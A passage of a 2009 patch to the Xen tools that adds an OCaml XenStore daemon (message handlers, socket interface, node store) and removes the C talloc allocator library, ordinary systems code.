+  and transaction = Transaction.make domain#id 
message.Message.header.Message.transaction_id in
+  try
+    if store#node_exists path
+    then
+      if xenstored#permissions#check store path Permission.WRITE domain#id
+      then
+        if path <> Store.root_path
+        then (
+          let paths = removed_paths store path in
+          List.iter (fun path -> xenstored#domain_entry_decr store transaction 
path) paths;
+          store#remove_node path;
+          xenstored#permissions#remove store path;
+          if message.Message.header.Message.transaction_id = 0l
+          then (
+            xenstored#transactions#invalidate path;
+            xenstored#watches#fire_watches path false true
+          );
+          domain#add_output_message (Message.ack message)
+        )
+        else domain#add_output_message (Message.error message Constants.EINVAL)
+      else domain#add_output_message (Message.error message Constants.EACCES)
+    else if store#node_exists (Store.parent_path path)
+    then
+      if xenstored#permissions#check store (Store.parent_path path) 
Permission.WRITE domain#id
+      then domain#add_output_message (Message.ack message)
+      else domain#add_output_message (Message.error message Constants.EACCES)
+    else domain#add_output_message (Message.error message Constants.ENOENT) (* 
XXX: This might be wrong *)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message 
(Message.error message errno)
+
+(* Process a set permissions message *)
+let process_set_perms domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = Store.canonicalise domain (List.hd split) in
+  let (permissions, reserved) =
+    if message.Message.payload.[pred (String.length message.Message.payload)] 
= Constants.null_char
+    then (List.tl split, Constants.null_string)
+    else (Utils.remove_last (List.tl split), List.nth split (pred (List.length 
split))) in
+  if xenstored#permissions#check store path Permission.WRITE domain#id
+  then (
+    (* XXX: Reserved value *)
+    if String.length reserved > 0 then ();
+    try
+      xenstored#permissions#set permissions store path;
+      xenstored#watches#fire_watches path 
(message.Message.header.Message.transaction_id <> 0l) false;
+      domain#add_output_message (Message.ack message)
+    with _ -> domain#add_output_message (Message.error message 
Constants.EACCES) (* XXX: errno? *)
+  )
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a transaction end message *)
+let process_transaction_end domain store xenstored message =
+  let transaction = Transaction.make domain#id 
message.Message.header.Message.transaction_id in
+  if xenstored#transactions#exists transaction
+  then (
+    Trace.destroy domain#id "transaction";
+    if Utils.strip_null message.Message.payload = Constants.payload_true
+    then
+      if xenstored#commit transaction
+      then domain#add_output_message (Message.ack message)
+      else domain#add_output_message (Message.error message Constants.EAGAIN)
+    else domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.ENOENT)
+
+(* Process a transaction start message *)
+let process_transaction_start domain store xenstored message =
+  try
+    if message.Message.header.Message.transaction_id = 0l
+    then
+      let transaction = xenstored#new_transaction domain store in
+      let payload = Utils.null_terminate (Int32.to_string 
transaction.Transaction.transaction_id) in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EBUSY)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message 
(Message.error message errno)
+
+(* Process an unwatch message *)
+let process_unwatch domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = List.nth split 0
+  and token = List.nth split 1
+  and reserved = if List.length split = 3 then List.nth split 2 else 
Constants.null_string in
+  let relative = Store.is_relative path in
+  let actual_path = if relative then Store.canonicalise domain path else path 
in
+  (* XXX: Reserved value *)
+  if String.length reserved > 0 then ();
+  if xenstored#watches#remove (Watch.make domain actual_path token relative)
+  then (
+    Trace.destroy domain#id "watch";
+    domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.ENOENT)
+
+(* Process a watch message *)
+let process_watch domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = List.nth split 0
+  and token = List.nth split 1
+  and reserved = if List.length split = 3 then List.nth split 2 else 
Constants.null_string in
+  let relative = Store.is_relative path in
+  let actual_path = if relative then Store.canonicalise domain path else path 
in
+  (* XXX: Reserved value *)
+  if String.length reserved > 0 then ();
+  if xenstored#add_watch domain (Watch.make domain actual_path token relative)
+  then (
+    Trace.create domain#id "watch";
+    domain#add_output_message (Message.ack message);
+    domain#add_output_message (Message.event ((Utils.null_terminate path) ^ 
(Utils.null_terminate token)))
+  )
+  else domain#add_output_message (Message.error message Constants.EEXIST)
+
+(* Process a write message *)
+let process_write domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let path = Store.canonicalise domain (List.hd split)
+  and value = Utils.combine (List.tl split) in
+  let transaction = Transaction.make domain#id 
message.Message.header.Message.transaction_id in
+  if not (store#node_exists path) || xenstored#permissions#check store path 
Permission.WRITE domain#id
+  then
+    if Domain.is_unprivileged domain && String.length value >= 
xenstored#options.Option.quota_max_entry_size
+    then domain#add_output_message (Message.error message Constants.ENOSPC)
+    else
+      try
+        if not (store#node_exists path)
+        then (
+          let paths = created_paths store path in
+          store#create_node path;
+          xenstored#permissions#add store path domain#id;
+          List.iter (fun path -> xenstored#domain_entry_incr store transaction 
path) paths
+        );
+        store#write_node path value;
+        if message.Message.header.Message.transaction_id = 0l
+        then (
+          xenstored#transactions#invalidate path;
+          xenstored#watches#fire_watches path false false
+        );
+        domain#add_output_message (Message.ack message)
+      with e -> raise e (*domain#add_output_message (Message.error message 
Constants.EINVAL)*) (* XXX: Wrong error? *)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a message *)
+let process (xenstored : Xenstored.xenstored) domain =
+  let message = domain#input_message in
+  let store = xenstored#transactions#store (Transaction.make domain#id 
message.Message.header.Message.transaction_id) in
+  if check message
+  then (
+    match message.Message.header.Message.message_type with
+    | Message.XS_DIRECTORY -> process_directory domain store xenstored message
+    | Message.XS_GET_DOMAIN_PATH -> process_get_domain_path domain store 
message
+    | Message.XS_GET_PERMS -> process_get_perms domain store xenstored message
+    | Message.XS_INTRODUCE -> process_introduce domain store xenstored message
+    | Message.XS_IS_DOMAIN_INTRODUCED -> process_is_domain_introduced domain 
store xenstored message
+    | Message.XS_MKDIR -> process_mkdir domain store xenstored message
+    | Message.XS_READ -> process_read domain store xenstored message
+    | Message.XS_RELEASE -> process_release domain store xenstored message
+    | Message.XS_RM -> process_rm domain store xenstored message
+    | Message.XS_SET_PERMS -> process_set_perms domain store xenstored message
+    | Message.XS_TRANSACTION_END -> process_transaction_end domain store 
xenstored message
+    | Message.XS_TRANSACTION_START -> process_transaction_start domain store 
xenstored message
+    | Message.XS_UNWATCH -> process_unwatch domain store xenstored message
+    | Message.XS_WATCH -> process_watch domain store xenstored message
+    | Message.XS_WRITE -> process_write domain store xenstored message
+    | _ -> domain#add_output_message (Message.error message Constants.EINVAL)
+  )
+  else domain#add_output_message (Message.error message Constants.EINVAL)
diff -r 10a8fae412c5 tools/xenstore/socket.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/socket.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,46 @@
+(* 
+    Socket for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Convert an int to a file descriptor *)
+external file_descr_of_int : int -> Unix.file_descr = "%identity"
+
+(* Convert a file descriptor to an int *)
+let int_of_file_descr fd = (Obj.magic (fd: Unix.file_descr) : int)
+
+(* Socket interface *)
+class socket_interface fd can_write in_set out_set =
+object (self)
+  inherit Interface.interface as super
+  val m_fd = fd
+  val m_can_write = can_write
+  val m_in_set = in_set
+  val m_out_set = out_set
+  method private fd = m_fd
+  method private in_set = !m_in_set
+  method private out_set = !m_out_set
+  method can_read = List.mem self#fd self#in_set
+  method can_write = can_write
+  method destroy = Unix.close self#fd
+  method read buffer offset length =
+    let bytes_read = Unix.read self#fd buffer offset length in
+    if bytes_read = 0 && length <> 0
+    then raise (Constants.Xs_error (Constants.EIO, "socket_interface#read", 
"could not read data"))
+    else bytes_read
+  method write buffer offset length = Unix.write self#fd buffer offset (min 
length (String.length buffer))
+end
diff -r 10a8fae412c5 tools/xenstore/store.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/store.ml   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,144 @@
+(* 
+    Store for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* XenStore node contents type *)
+type ('node, 'contents) node_contents =
+  | Empty
+  | Value of 'contents
+  | Children of 'node list
+  | Hack of 'contents * 'node list
+
+let dividor = '/'
+let dividor_str = String.make 1 dividor
+let root_path = dividor_str
+let domain_root = root_path ^ "local" ^ dividor_str ^ "domain" ^ dividor_str
+let valid_characters = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/_@"
+
+(* Return the base path of a path *)
+let base_path path =
+  if path = root_path
+  then path
+  else
+    let start = succ (String.rindex path dividor) in
+    String.sub path start ((String.length path) - start)
+
+(* Compare two nodes *)
+let compare node1 node2 =
+  String.compare node1#path node2#path
+
+(* Check if a path is a child of another path *)
+let is_child child parent =
+  if parent = root_path
+  then true
+  else
+    let length = min (String.length parent) (String.length child) in
+    if String.sub child 0 length <> String.sub parent 0 length
+    then false
+    else
+      let parent_length = String.length parent
+      and child_length = String.length child in
+      (* XXX: This returns child = parent *)
+      if parent_length = child_length
+      then true
+      else if parent_length < child_length then String.get child parent_length 
= dividor
+      else false
+
+(* Check if a path is an event path *)
+let is_event path =
+  path.[0] = Constants.event_char
+
+(* Check if a path is a relative path *)
+let is_relative path =
+  not (is_event path) && String.sub path 0 (String.length root_path) <> 
root_path
+
+(* Iterate over nodes applying function f to each node *)
+let rec iter f node =
+  match node#contents with
+  | Empty -> ()
+  | Children children -> List.iter (fun child -> iter f child) children
+  | Value value -> f value
+  | Hack (value, children) -> f value; List.iter (fun child -> iter f child) 
children
+
+(* Return the parent path of a path *)
+let parent_path path =
+  let slash = String.rindex path dividor in
+  if slash = 0 then root_path else String.sub path 0 slash
+
+(* Return canonicalised path *)
+let canonicalise domain path =
+  if not (is_relative path) then path else domain_root ^ (string_of_int 
domain#id) ^ dividor_str ^ path
+
+(* XenStore node type *)
+class ['contents] node path (contents : ('contents node, 'contents) 
node_contents) =
+object (self)
+  val m_path = path
+  val mutable m_contents = contents
+  method add_child child =
+    match self#contents with
+    | Empty -> m_contents <- Children [ child ]; true
+    | Value value -> m_contents <- Hack (value, [ child ]); true (* false *)
+    | Children children -> m_contents <- Children (List.sort compare (child :: 
children)); true
+    | Hack (value, children) -> m_contents <- Hack (value, List.sort compare 
(child :: children)); true
+  method contents = m_contents
+  method path = m_path
+  method get_child child_path =
+    match self#contents with
+    | Children children | Hack (_, children) -> (
+          try List.find (fun child_node -> child_node#path = child_path) 
children
+          with Not_found -> raise (Constants.Xs_error (Constants.ENOENT, 
"Store.node#get_child", child_path))
+        )
+    | _ -> raise (Constants.Xs_error (Constants.ENOENT, 
"Store.node#get_child", child_path))
+  method remove_child child_path =
+    match self#contents with
+    | Children children -> m_contents <- Children (List.filter (fun child_node 
-> child_node#path <> child_path) children)
+    | Hack (value, children) -> m_contents <- Hack (value, List.filter (fun 
child_node -> child_node#path <> child_path) children)
+    | _ -> raise (Constants.Xs_error (Constants.ENOENT, 
"Store.node#remove_child", path))
+  method set_contents contents = m_contents <- contents
+end
+
+class ['contents] store =
+object (self)
+  val m_root : 'contents node = new node root_path (Children [])
+  method private construct_node path =
+    let parent_path = parent_path path in
+    let parent_node = try self#get_node parent_path with _ -> 
self#construct_node parent_path
+    and node = new node path Empty in
+    if parent_node#add_child node then node else raise (Constants.Xs_error 
(Constants.ENOENT, "Store.store#construct_node", path))
+  method private get_node path = if path = root_path then self#root else 
(self#get_node (parent_path path))#get_child path
+  method private root = m_root
+  method create_node path = ignore (self#construct_node path)
+  method iter f = iter f self#root
+  method node_exists path = try ignore (self#get_node path); true with _ -> 
false
+  method read_node path = (self#get_node path)#contents
+  method remove_node path = (self#get_node (parent_path path))#remove_child 
path
+  method replace_node (node : 'contents node) =
+    let node_to_replace =
+      if node#path = root_path
+      then self#root
+      else (
+        if self#node_exists node#path then self#remove_node node#path;
+        self#construct_node node#path
+      ) in
+    node_to_replace#set_contents node#contents
+  method write_node path (contents : 'contents) =
+    let node = self#get_node path in
+    match node#contents with
+    | Empty | Value _ -> node#set_contents (Value contents)
+    | Children children | Hack (_, children) -> node#set_contents (Hack 
(contents, children))
+end
diff -r 10a8fae412c5 tools/xenstore/talloc.c
--- a/tools/xenstore/talloc.c   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,1311 +0,0 @@
-/*
-   Samba Unix SMB/CIFS implementation.
-
-   Samba trivial allocation library - new interface
-
-   NOTE: Please read talloc_guide.txt for full documentation
-
-   Copyright (C) Andrew Tridgell 2004
-
-     ** NOTE! The following LGPL license applies to the talloc
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-/*
-  inspired by http://swapped.cc/halloc/
-*/
-
-#ifdef _SAMBA_BUILD_
-#include "includes.h"
-#if ((SAMBA_VERSION_MAJOR==3)&&(SAMBA_VERSION_MINOR<9))
-/* This is to circumvent SAMBA3's paranoid malloc checker. Here in this file
- * we trust ourselves... */
-#ifdef malloc
-#undef malloc
-#endif
-#ifdef realloc
-#undef realloc
-#endif
-#endif
-#else
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdarg.h>
-#include <stdint.h>
-#include "talloc.h"
-/* assume a modern system */
-#define HAVE_VA_COPY
-#endif
-
-/* use this to force every realloc to change the pointer, to stress test
-   code that might not cope */
-#define ALWAYS_REALLOC 0
-
-
-#define MAX_TALLOC_SIZE 0x10000000
-#define TALLOC_MAGIC 0xe814ec70
-#define TALLOC_FLAG_FREE 0x01
-#define TALLOC_FLAG_LOOP 0x02
-#define TALLOC_MAGIC_REFERENCE ((const char *)1)
-
-/* by default we abort when given a bad pointer (such as when talloc_free() is 
called 
-   on a pointer that came from malloc() */
-#ifndef TALLOC_ABORT
-#define TALLOC_ABORT(reason) abort()
-#endif
-
-#ifndef discard_const_p
-#if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T)
-# define discard_const_p(type, ptr) ((type *)((intptr_t)(ptr)))
-#else
-# define discard_const_p(type, ptr) ((type *)(ptr))
-#endif
-#endif
-
-/* this null_context is only used if talloc_enable_leak_report() or
-   talloc_enable_leak_report_full() is called, otherwise it remains
-   NULL
-*/
-static const void *null_context;
-static void *cleanup_context;
-
-
-struct talloc_reference_handle {
-       struct talloc_reference_handle *next, *prev;
-       void *ptr;
-};
-
-typedef int (*talloc_destructor_t)(void *);
-
-struct talloc_chunk {
-       struct talloc_chunk *next, *prev;
-       struct talloc_chunk *parent, *child;
-       struct talloc_reference_handle *refs;
-       unsigned int null_refs; /* references from null_context */
-       talloc_destructor_t destructor;
-       const char *name;
-       size_t size;
-       unsigned flags;
-};
-
-/* 16 byte alignment seems to keep everyone happy */
-#define TC_HDR_SIZE ((sizeof(struct talloc_chunk)+15)&~15)
-#define TC_PTR_FROM_CHUNK(tc) ((void *)(TC_HDR_SIZE + (char*)tc))
-
-/* panic if we get a bad magic value */
-static struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)
-{
-       const char *pp = ptr;
-       struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - 
TC_HDR_SIZE);
-       if ((tc->flags & ~0xF) != TALLOC_MAGIC) { 
-               TALLOC_ABORT("Bad talloc magic value - unknown value"); 
-       }
-       if (tc->flags & TALLOC_FLAG_FREE) {
-               TALLOC_ABORT("Bad talloc magic value - double free"); 
-       }
-       return tc;
-}
-
-/* hook into the front of the list */
-#define _TLIST_ADD(list, p) \
-do { \
-        if (!(list)) { \
-               (list) = (p); \
-               (p)->next = (p)->prev = NULL; \
-       } else { \
-               (list)->prev = (p); \
-               (p)->next = (list); \
-               (p)->prev = NULL; \
-               (list) = (p); \
-       }\
-} while (0)
-
-/* remove an element from a list - element doesn't have to be in list. */
-#define _TLIST_REMOVE(list, p) \
-do { \
-       if ((p) == (list)) { \
-               (list) = (p)->next; \
-               if (list) (list)->prev = NULL; \
-       } else { \
-               if ((p)->prev) (p)->prev->next = (p)->next; \
-               if ((p)->next) (p)->next->prev = (p)->prev; \
-       } \
-       if ((p) && ((p) != (list))) (p)->next = (p)->prev = NULL; \
-} while (0)
-
-
-/*
-  return the parent chunk of a pointer
-*/
-static struct talloc_chunk *talloc_parent_chunk(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       while (tc->prev) tc=tc->prev;
-       return tc->parent;
-}
-
-void *talloc_parent(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_parent_chunk(ptr);
-       return tc? TC_PTR_FROM_CHUNK(tc) : NULL;
-}
-
-/* 
-   Allocate a bit of memory as a child of an existing pointer
-*/
-void *_talloc(const void *context, size_t size)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if (size >= MAX_TALLOC_SIZE) {
-               return NULL;
-       }
-
-       tc = malloc(TC_HDR_SIZE+size);
-       if (tc == NULL) return NULL;
-
-       tc->size = size;
-       tc->flags = TALLOC_MAGIC;
-       tc->destructor = NULL;
-       tc->child = NULL;
-       tc->name = NULL;
-       tc->refs = NULL;
-       tc->null_refs = 0;
-
-       if (context) {
-               struct talloc_chunk *parent = talloc_chunk_from_ptr(context);
-
-               tc->parent = parent;
-
-               if (parent->child) {
-                       parent->child->parent = NULL;
-               }
-
-               _TLIST_ADD(parent->child, tc);
-       } else {
-               tc->next = tc->prev = tc->parent = NULL;
-       }
-
-       return TC_PTR_FROM_CHUNK(tc);
-}
-
-
-/*
-  setup a destructor to be called on free of a pointer
-  the destructor should return 0 on success, or -1 on failure.
-  if the destructor fails then the free is failed, and the memory can
-  be continued to be used
-*/
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *))
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->destructor = destructor;
-}
-
-/*
-  increase the reference count on a piece of memory. 
-*/
-void talloc_increase_ref_count(const void *ptr)
-{
-       struct talloc_chunk *tc;
-       if (ptr == NULL) return;
-
-       tc = talloc_chunk_from_ptr(ptr);
-       tc->null_refs++;
-}
-
-/*
-  helper for talloc_reference()
-*/
-static int talloc_reference_destructor(void *ptr)
-{
-       struct talloc_reference_handle *handle = ptr;
-       struct talloc_chunk *tc1 = talloc_chunk_from_ptr(ptr);
-       struct talloc_chunk *tc2 = talloc_chunk_from_ptr(handle->ptr);
-       if (tc1->destructor != (talloc_destructor_t)-1) {
-               tc1->destructor = NULL;
-       }
-       _TLIST_REMOVE(tc2->refs, handle);
-       talloc_free(handle);
-       return 0;
-}
-
-/*
-  make a secondary reference to a pointer, hanging off the given context.
-  the pointer remains valid until both the original caller and this given
-  context are freed.
-  
-  the major use for this is when two different structures need to reference 
the 
-  same underlying data, and you want to be able to free the two instances 
separately,
-  and in either order
-*/
-void *talloc_reference(const void *context, const void *ptr)
-{
-       struct talloc_chunk *tc;
-       struct talloc_reference_handle *handle;
-       if (ptr == NULL) return NULL;
-
-       tc = talloc_chunk_from_ptr(ptr);
-       handle = talloc_named_const(context, sizeof(*handle), 
TALLOC_MAGIC_REFERENCE);
-
-       if (handle == NULL) return NULL;
-
-       /* note that we hang the destructor off the handle, not the
-          main context as that allows the caller to still setup their
-          own destructor on the context if they want to */
-       talloc_set_destructor(handle, talloc_reference_destructor);
-       handle->ptr = discard_const_p(void, ptr);
-       _TLIST_ADD(tc->refs, handle);
-       return handle->ptr;
-}
-
-/*
-  remove a secondary reference to a pointer. This undo's what
-  talloc_reference() has done. The context and pointer arguments
-  must match those given to a talloc_reference()
-*/
-static int talloc_unreference(const void *context, const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       struct talloc_reference_handle *h;
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if ((context == null_context) && tc->null_refs) {
-               tc->null_refs--;
-               return 0;
-       }
-
-       for (h=tc->refs;h;h=h->next) {
-               struct talloc_chunk *p = talloc_parent_chunk(h);
-               if (p == NULL) {
-                       if (context == NULL) break;
-               } else if (TC_PTR_FROM_CHUNK(p) == context) {
-                       break;
-               }
-       }
-       if (h == NULL) {
-               return -1;
-       }
-
-       talloc_set_destructor(h, NULL);
-       _TLIST_REMOVE(tc->refs, h);
-       talloc_free(h);
-       return 0;
-}
-
-/*
-  remove a specific parent context from a pointer. This is a more
-  controlled varient of talloc_free()
-*/
-int talloc_unlink(const void *context, void *ptr)
-{
-       struct talloc_chunk *tc_p, *new_p;
-       void *new_parent;
-
-       if (ptr == NULL) {
-               return -1;
-       }
-
-       if (context == NULL) {
-               context = null_context;
-       }
-
-       if (talloc_unreference(context, ptr) == 0) {
-               return 0;
-       }
-
-       if (context == NULL) {
-               if (talloc_parent_chunk(ptr) != NULL) {
-                       return -1;
-               }
-       } else {
-               if (talloc_chunk_from_ptr(context) != talloc_parent_chunk(ptr)) 
{
-                       return -1;
-               }
-       }
-       
-       tc_p = talloc_chunk_from_ptr(ptr);
-
-       if (tc_p->refs == NULL) {
-               return talloc_free(ptr);
-       }
-
-       new_p = talloc_parent_chunk(tc_p->refs);
-       if (new_p) {
-               new_parent = TC_PTR_FROM_CHUNK(new_p);
-       } else {
-               new_parent = NULL;
-       }
-
-       if (talloc_unreference(new_parent, ptr) != 0) {
-               return -1;
-       }
-
-       talloc_steal(new_parent, ptr);
-
-       return 0;
-}
-
-/*
-  add a name to an existing pointer - va_list version
-*/
-static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) 
PRINTF_ATTRIBUTE(2,0);
-
-static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->name = talloc_vasprintf(ptr, fmt, ap);
-       if (tc->name) {
-               talloc_set_name_const(tc->name, ".name");
-       }
-}
-
-/*
-  add a name to an existing pointer
-*/
-void talloc_set_name(const void *ptr, const char *fmt, ...)
-{
-       va_list ap;
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-}
-
-/*
-   more efficient way to add a name to a pointer - the name must point to a 
-   true string constant
-*/
-void talloc_set_name_const(const void *ptr, const char *name)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       tc->name = name;
-}
-
-/*
-  create a named talloc pointer. Any talloc pointer can be named, and
-  talloc_named() operates just like talloc() except that it allows you
-  to name the pointer.
-*/
-void *talloc_named(const void *context, size_t size, const char *fmt, ...)
-{
-       va_list ap;
-       void *ptr;
-
-       ptr = _talloc(context, size);
-       if (ptr == NULL) return NULL;
-
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-
-       return ptr;
-}
-
-/*
-  create a named talloc pointer. Any talloc pointer can be named, and
-  talloc_named() operates just like talloc() except that it allows you
-  to name the pointer.
-*/
-void *talloc_named_const(const void *context, size_t size, const char *name)
-{
-       void *ptr;
-
-       ptr = _talloc(context, size);
-       if (ptr == NULL) {
-               return NULL;
-       }
-
-       talloc_set_name_const(ptr, name);
-
-       return ptr;
-}
-
-/*
-  return the name of a talloc ptr, or "UNNAMED"
-*/
-const char *talloc_get_name(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       if (tc->name == TALLOC_MAGIC_REFERENCE) {
-               return ".reference";
-       }
-       if (tc->name) {
-               return tc->name;
-       }
-       return "UNNAMED";
-}
-
-
-/*
-  check if a pointer has the given name. If it does, return the pointer,
-  otherwise return NULL
-*/
-void *talloc_check_name(const void *ptr, const char *name)
-{
-       const char *pname;
-       if (ptr == NULL) return NULL;
-       pname = talloc_get_name(ptr);
-       if (pname == name || strcmp(pname, name) == 0) {
-               return discard_const_p(void, ptr);
-       }
-       return NULL;
-}
-
-
-/*
-  this is for compatibility with older versions of talloc
-*/
-void *talloc_init(const char *fmt, ...)
-{
-       va_list ap;
-       void *ptr;
-
-       talloc_enable_null_tracking();
-
-       ptr = _talloc(NULL, 0);
-       if (ptr == NULL) return NULL;
-
-       va_start(ap, fmt);
-       talloc_set_name_v(ptr, fmt, ap);
-       va_end(ap);
-
-       return ptr;
-}
-
-/*
-  this is a replacement for the Samba3 talloc_destroy_pool functionality. It
-  should probably not be used in new code. It's in here to keep the talloc
-  code consistent across Samba 3 and 4.
-*/
-static void talloc_free_children(void *ptr)
-{
-       struct talloc_chunk *tc;
-
-       if (ptr == NULL) {
-               return;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       while (tc->child) {
-               /* we need to work out who will own an abandoned child
-                  if it cannot be freed. In priority order, the first
-                  choice is owner of any remaining reference to this
-                  pointer, the second choice is our parent, and the
-                  final choice is the null context. */
-               void *child = TC_PTR_FROM_CHUNK(tc->child);
-               const void *new_parent = null_context;
-               if (tc->child->refs) {
-                       struct talloc_chunk *p = 
talloc_parent_chunk(tc->child->refs);
-                       if (p) new_parent = TC_PTR_FROM_CHUNK(p);
-               }
-               if (talloc_free(child) == -1) {
-                       if (new_parent == null_context) {
-                               struct talloc_chunk *p = 
talloc_parent_chunk(ptr);
-                               if (p) new_parent = TC_PTR_FROM_CHUNK(p);
-                       }
-                       talloc_steal(new_parent, child);
-               }
-       }
-}
-
-/* 
-   free a talloc pointer. This also frees all child pointers of this 
-   pointer recursively
-
-   return 0 if the memory is actually freed, otherwise -1. The memory
-   will not be freed if the ref_count is > 1 or the destructor (if
-   any) returns non-zero
-*/
-int talloc_free(void *ptr)
-{
-       struct talloc_chunk *tc;
-
-       if (ptr == NULL) {
-               return -1;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->null_refs) {
-               tc->null_refs--;
-               return -1;
-       }
-
-       if (tc->refs) {
-               talloc_reference_destructor(tc->refs);
-               return -1;
-       }
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               /* we have a free loop - stop looping */
-               return 0;
-       }
-
-       if (tc->destructor) {
-               talloc_destructor_t d = tc->destructor;
-               if (d == (talloc_destructor_t)-1) {
-                       return -1;
-               }
-               tc->destructor = (talloc_destructor_t)-1;
-               if (d(ptr) == -1) {
-                       tc->destructor = d;
-                       return -1;
-               }
-               tc->destructor = NULL;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       talloc_free_children(ptr);
-
-       if (tc->parent) {
-               _TLIST_REMOVE(tc->parent->child, tc);
-               if (tc->parent->child) {
-                       tc->parent->child->parent = tc->parent;
-               }
-       } else {
-               if (tc->prev) tc->prev->next = tc->next;
-               if (tc->next) tc->next->prev = tc->prev;
-       }
-
-       tc->flags |= TALLOC_FLAG_FREE;
-
-       free(tc);
-       return 0;
-}
-
-
-
-/*
-  A talloc version of realloc. The context argument is only used if
-  ptr is NULL
-*/
-void *_talloc_realloc(const void *context, void *ptr, size_t size, const char 
*name)
-{
-       struct talloc_chunk *tc;
-       void *new_ptr;
-
-       /* size zero is equivalent to free() */
-       if (size == 0) {
-               talloc_free(ptr);
-               return NULL;
-       }
-
-       if (size >= MAX_TALLOC_SIZE) {
-               return NULL;
-       }
-
-       /* realloc(NULL) is equavalent to malloc() */
-       if (ptr == NULL) {
-               return talloc_named_const(context, size, name);
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       /* don't allow realloc on referenced pointers */
-       if (tc->refs) {
-               return NULL;
-       }
-
-       /* by resetting magic we catch users of the old memory */
-       tc->flags |= TALLOC_FLAG_FREE;
-
-#if ALWAYS_REALLOC
-       new_ptr = malloc(size + TC_HDR_SIZE);
-       if (new_ptr) {
-               memcpy(new_ptr, tc, tc->size + TC_HDR_SIZE);
-               free(tc);
-       }
-#else
-       new_ptr = realloc(tc, size + TC_HDR_SIZE);
-#endif
-       if (!new_ptr) { 
-               tc->flags &= ~TALLOC_FLAG_FREE; 
-               return NULL; 
-       }
-
-       tc = new_ptr;
-       tc->flags &= ~TALLOC_FLAG_FREE; 
-       if (tc->parent) {
-               tc->parent->child = new_ptr;
-       }
-       if (tc->child) {
-               tc->child->parent = new_ptr;
-       }
-
-       if (tc->prev) {
-               tc->prev->next = tc;
-       }
-       if (tc->next) {
-               tc->next->prev = tc;
-       }
-
-       tc->size = size;
